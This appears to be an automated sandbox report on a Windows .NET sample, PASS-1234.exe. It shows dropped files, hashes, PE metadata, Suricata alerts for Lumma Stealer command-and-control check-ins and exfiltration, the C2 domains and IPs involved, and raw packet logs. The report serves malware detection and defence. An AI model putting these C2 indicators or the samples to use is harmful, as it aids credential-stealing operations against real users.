	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	104.21.24.64
	over.ps1	Get hash	malicious	Vidar	Browse	172.64.41.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	172.67.217.81
CLOUDFLARENETUS	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.52.90
	setup.msi	Get hash	malicious	Unknown	Browse	188.114.97.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	104.21.24.64
	over.ps1	Get hash	malicious	Vidar	Browse	172.64.41.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	172.67.217.81

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.96.1
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.96.1
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.96.1
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.96.1
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.96.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.96.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.96.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	188.114.97.3 104.21.96.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 104.21.96.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PASS-1234.exe_e021ab1d3b8f5f284669294561b364c83af9d6fb_861bfbec_73b98097-6c03-4186-9005-e2bd03b99b7e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.989892371139277
Encrypted:	false
SSDEEP:	192:M+sFg6JTekd0BU/iaG1CzuiFL9Z24IO8Nn:0Fg6JT/eBU/iapzuiFpY4IO8N
MD5:	6596F6F67AB8F64BD3048619A510F631
SHA1:	FFE65C2E3B8185F275BCB8B5A6173CDF74CDB138
SHA-256:	60DF695631AB6A773E136AB016AC1EC82532A862FCF227137B63E13237DBC683
SHA-512:	0A5AED60834DC1D5696639CE697E18947B399068DC794DF0A268F9198A814E2326D609B397C912B921BB1D7DD8C4F22635DFA94EB82BCF322F1741AB8CD1E981
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.3.6.7.5.3.5.8.1.4.1.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.3.6.7.5.5.0.8.1.4.3.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.b.9.8.0.9.7.-.6.c.0.3.-.4.1.8.6.-.9.0.0.5.-.e.2.b.d.0.3.b.9.9.b.7.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.9.b.4.b.c.a.-.8.6.7.f.-.4.e.6.a.-.9.2.a.f.-.2.f.d.7.c.d.1.c.c.5.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.A.S.S.-.1.2.3.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.a.d.i.s.o.n.V.i.o.l.e.t.T.e.s.s.a...p.d.f.K.D.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.7.c.-.0.0.0.1.-.0.0.1.5.-.5.1.4.f.-.a.f.8.5.a.2.5.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.0.7.a.0.d.9.1.4.9.f.e.3.b.8.7.0.7.6.f.3.3.e.7.1.9.a.1.a.9.f.7.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.d.2.a.e.2.4.0.5.d.b.d.7.7.d.4.d.6.c.2.2.6.5.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERECA6.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 31 16:39:14 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	196696
Entropy (8bit):	3.384647930402179
Encrypted:	false
SSDEEP:	1536:Dt4zdl3jgtKcW3nxUCDKX9rpN4uE2aOayLTgGsokODgkFw+t:54n2WXBKtD4uEqayLTg7kmQ
MD5:	35D1521778DAF1E68C9CFF796150879F
SHA1:	F809429AFEB044D1AC44E3CF65CC9ACA2FDCB85B
SHA-256:	5B878B118B50C67B4CE7C75AABBAC4EA5E673D4AB9657DD5189A14C2B36E2859
SHA-512:	00CA965E8E66B3D029F375C5C30B6052390978DDA36547FB3DF1A92F952343E2EE0F72537DE82C6F33211ED216839900C5771F4F2518F0D99B94007CECF19DC9
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......2.tg............D...............X.......$................J..........`.......8...........T...........00..(...........,............ ..............................................................................eJ....... ......GenuineIntel............T.......\|...0.tg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF189.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8408
Entropy (8bit):	3.7068200955563277
Encrypted:	false
SSDEEP:	192:R6l7wVeJut69b6Y2DpSUkTcpyugmfZ2YiprQ89bvTsfnLlm:R6lXJ06B6YkSUJpyugmfEY6v4fk
MD5:	FACC822EACD46C831D06C8E1A338170B
SHA1:	3A9142F0179FA46C950E62DFF9C828EE4FCA27EB
SHA-256:	5641997628A584813114FD406BA2FA184969387CEDFED26DD213AAB8FAD9E080
SHA-512:	70A5E6C56F56A93DA6D4243761E6FF1217873F858584D4341F62C845818D680E9015381E29B6C8707B14C690D7A3DD6EF3D806FE6A7023138EF391208EE07F9E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1B9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4776
Entropy (8bit):	4.528568462195372
Encrypted:	false
SSDEEP:	48:cvIwWl8zsBJg77aI9vD7EWpW8VYcYm8M4JwI2F+f+q8vPptwn4Id:uIjfTI7Fp7VsJwGfKBSn4Id
MD5:	7604105388109DEB7C1FFC14AC49007E
SHA1:	54C0B260E26E4111ECFA4E9A1A099069E44012F9
SHA-256:	350FEBD032A843CEBA45352E80B5D08F1906A60D2666BAB2B86B0051F769A8AE
SHA-512:	57D2EE6B2F510724A887CA8EDC8920752A4A646BE9C3D70D2BDF19E3D88F3711295C818977D16014E1A996F5513B310E2E9FB6058341446E2CDD8DBEAEF69033
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="655661" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Users\user\Desktop\PASS-1234.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	442880
Entropy (8bit):	7.120845466043454
Encrypted:	false
SSDEEP:	6144:YCBQRUrXgU86ZwW+G3QmRtaAnrZwyBwnB9yEwQe37zgg8u5W:vBRgU86D+vugSwywn3aH75W
MD5:	DB9FA73B991DCA9E4BC648F0943D5FC2
SHA1:	856E36EC4C04B47D5072DCA1965FC79F8030BD77
SHA-256:	1ADF7A2EA992D38467E1170451445D5492FA5C8D00C8D62776281C61393910C4
SHA-512:	32C390A7D02263BD661B6D3D7BA2B3B6E59BFD9BE0E2D46F4CB3F916A79233057C0A2180C2A2689C585C5424EEAE5C3156A3154151B76FF75ECB4580D704B294
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L.....sg...........!.........:............................................................@.............................\|.......P...................................\...............................x...@...............T............................text...(........................... ..`.rdata...\.......^..................@..@.data...............................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468788450702494
Encrypted:	false
SSDEEP:	6144:czZfpi6ceLPx9skLmb0fPZWSP3aJG8nAgeiJRMMhA2zX4WABluuNojDH5S:iZHtPZWOKnMM6bFpuj4
MD5:	0F05ECC39271234EC0FFF5D2EF06D370
SHA1:	557F5F8FAD3740732C121C5C42527B05F51DB47F
SHA-256:	E8E893EBE12CAC704F9A5711891A659A45F5346735F0A028E92907EB62CD627A
SHA-512:	5E8104F97F5800465A07A1F6DEC5545265C5887EE225E1D119C9F1528F9DC624094D5DD11A698E8DF02126370989A8C57C6C13E5D2F58F863BBC16EE6A29E356
Malicious:	false
Reputation:	low
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..P..[................................................................................................................................................................................................................................................................................................................................................F.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\PASS-1234.exe
File Type:	ASCII text, with very long lines (354), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	4.534460721917906
Encrypted:	false
SSDEEP:	24:7v74NuVMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4EMff2p8p14nrPKktp
MD5:	E1192DC383FB3C1F3356A5D5D58D2E93
SHA1:	D3BC6886D9BBA939DB0F3B94405B3FFAE845AF6F
SHA-256:	2B4C0FE835D8CEE104858536B6B526C49A820D8228499EFF9454359ED24A3C37
SHA-512:	BDA9F7F2D40F79BF41C625467C5B65BB908901B3D3DE989F4A55B33380989B8FC8B8DA0765C434B7150BAD3001FE6DB735DB12209468669B1CE9AC5FB15A7B02
Malicious:	false
Preview:	.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "MadisonVioletTessa" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetSt

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.642427017875631
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PASS-1234.exe
File size:	761'856 bytes
MD5:	cf15f3e3576d512cf0696d4035212451
SHA1:	b9d2ae2405dbd77d4d6c226589990872319f98ce
SHA256:	3114e7c13f6545c7cb73343fbcb4ec4b0648751091d796f7923b17818603fb36
SHA512:	2b1d8a5a5f24768c6a733af9393376e533958719de452f34d88496f98cc600efc7ab94e57a23e57326d4106e978a5a24721ee633d1e498dedc6c9e949a0a83c8
SSDEEP:	12288:J8t1vT9z4WJ7lM3us92O7naDBKKnTur1AOy56/NlbFLJkG3Oa4j3cEsjp2LMVmAL:J45zzBi96Djo1QU/rFLS4Src
TLSH:	E5F44A9C726072DFC867D472DEA82C68FA6174BB931F4217A02716AD9E0D897CF150F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sg..............0.............. ... ... ....@.. .......................@............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4c200a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6773E6B9 [Tue Dec 31 12:42:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004C2000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9274c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbe000	0x620	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc2000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x92000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
C;FTo	0x2000	0x8e3a4	0x8e400	41c5f07a071f717348063b41ba374baf	False	1.0003192278119508	data	7.999702756897987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x92000	0x2aad0	0x2ac00	51fa688b02d098fc5ca64330fee57d0b	False	0.3164804915935672	data	4.6017567715327985	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbe000	0x620	0x800	f8a57bb5b4871395e61edfad4a51a674	False	0.35595703125	data	3.5124491312401203	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc0000	0xc	0x200	f49806f5a4d3af8de38be4272fdc1bfe	False	0.044921875	data	0.09262353601004472	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xc2000	0x10	0x200	6740637d846e5e93ae64944cc2f88318	False	0.044921875	data	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbe0a0	0x394	OpenPGP Secret Key			0.45414847161572053
RT_MANIFEST	0xbe434	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T17:39:14.247349+0100	2058550	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)	1	192.168.2.6	50384	1.1.1.1	53	UDP
2024-12-31T17:39:14.786997+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.6	49709	188.114.97.3	443	TCP
2024-12-31T17:39:14.786997+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49709	188.114.97.3	443	TCP
2024-12-31T17:39:46.220798+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49709	188.114.97.3	443	TCP
2024-12-31T17:39:46.220798+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49709	188.114.97.3	443	TCP
2024-12-31T17:39:46.244581+0100	2058616	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)	1	192.168.2.6	57616	1.1.1.1	53	UDP
2024-12-31T17:39:46.331181+0100	2058598	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)	1	192.168.2.6	57016	1.1.1.1	53	UDP
2024-12-31T17:39:46.812877+0100	2058599	ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)	1	192.168.2.6	49898	104.21.96.1	443	TCP
2024-12-31T17:39:46.812877+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49898	104.21.96.1	443	TCP
2024-12-31T17:40:07.873836+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49898	104.21.96.1	443	TCP
2024-12-31T17:40:07.873836+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49898	104.21.96.1	443	TCP
2024-12-31T17:40:08.343881+0100	2058599	ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)	1	192.168.2.6	49986	104.21.96.1	443	TCP
2024-12-31T17:40:08.343881+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49986	104.21.96.1	443	TCP
2024-12-31T17:40:08.799774+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49986	104.21.96.1	443	TCP
2024-12-31T17:40:08.799774+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49986	104.21.96.1	443	TCP
2024-12-31T17:40:09.507842+0100	2058599	ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)	1	192.168.2.6	49988	104.21.96.1	443	TCP
2024-12-31T17:40:09.507842+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49988	104.21.96.1	443	TCP
2024-12-31T17:40:10.010366+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49988	104.21.96.1	443	TCP
2024-12-31T17:40:10.734503+0100	2058599	ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)	1	192.168.2.6	49989	104.21.96.1	443	TCP
2024-12-31T17:40:10.734503+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49989	104.21.96.1	443	TCP
2024-12-31T17:40:11.944071+0100	2058599	ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)	1	192.168.2.6	49990	104.21.96.1	443	TCP
2024-12-31T17:40:11.944071+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49990	104.21.96.1	443	TCP
2024-12-31T17:40:13.518980+0100	2058599	ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)	1	192.168.2.6	49991	104.21.96.1	443	TCP
2024-12-31T17:40:13.518980+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49991	104.21.96.1	443	TCP
2024-12-31T17:40:16.683127+0100	2058599	ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)	1	192.168.2.6	49992	104.21.96.1	443	TCP
2024-12-31T17:40:16.683127+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49992	104.21.96.1	443	TCP
2024-12-31T17:40:18.160408+0100	2058599	ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)	1	192.168.2.6	49993	104.21.96.1	443	TCP
2024-12-31T17:40:18.160408+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49993	104.21.96.1	443	TCP
2024-12-31T17:40:21.336200+0100	2058599	ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)	1	192.168.2.6	49994	104.21.96.1	443	TCP
2024-12-31T17:40:21.336200+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49994	104.21.96.1	443	TCP
2024-12-31T17:40:21.794131+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49994	104.21.96.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:39:14.299583912 CET	49709	443	192.168.2.6	188.114.97.3
Dec 31, 2024 17:39:14.299633980 CET	443	49709	188.114.97.3	192.168.2.6
Dec 31, 2024 17:39:14.299724102 CET	49709	443	192.168.2.6	188.114.97.3
Dec 31, 2024 17:39:14.303783894 CET	49709	443	192.168.2.6	188.114.97.3
Dec 31, 2024 17:39:14.303797960 CET	443	49709	188.114.97.3	192.168.2.6
Dec 31, 2024 17:39:14.786921978 CET	443	49709	188.114.97.3	192.168.2.6
Dec 31, 2024 17:39:14.786997080 CET	49709	443	192.168.2.6	188.114.97.3
Dec 31, 2024 17:39:14.825481892 CET	49709	443	192.168.2.6	188.114.97.3
Dec 31, 2024 17:39:14.825505972 CET	443	49709	188.114.97.3	192.168.2.6
Dec 31, 2024 17:39:14.825853109 CET	443	49709	188.114.97.3	192.168.2.6
Dec 31, 2024 17:39:14.875792027 CET	49709	443	192.168.2.6	188.114.97.3
Dec 31, 2024 17:39:15.799333096 CET	49709	443	192.168.2.6	188.114.97.3
Dec 31, 2024 17:39:15.799352884 CET	49709	443	192.168.2.6	188.114.97.3
Dec 31, 2024 17:39:15.799484968 CET	443	49709	188.114.97.3	192.168.2.6
Dec 31, 2024 17:39:46.220010042 CET	49709	443	192.168.2.6	188.114.97.3
Dec 31, 2024 17:39:46.341721058 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:39:46.341758966 CET	443	49898	104.21.96.1	192.168.2.6
Dec 31, 2024 17:39:46.341933012 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:39:46.342410088 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:39:46.342423916 CET	443	49898	104.21.96.1	192.168.2.6
Dec 31, 2024 17:39:46.812777042 CET	443	49898	104.21.96.1	192.168.2.6
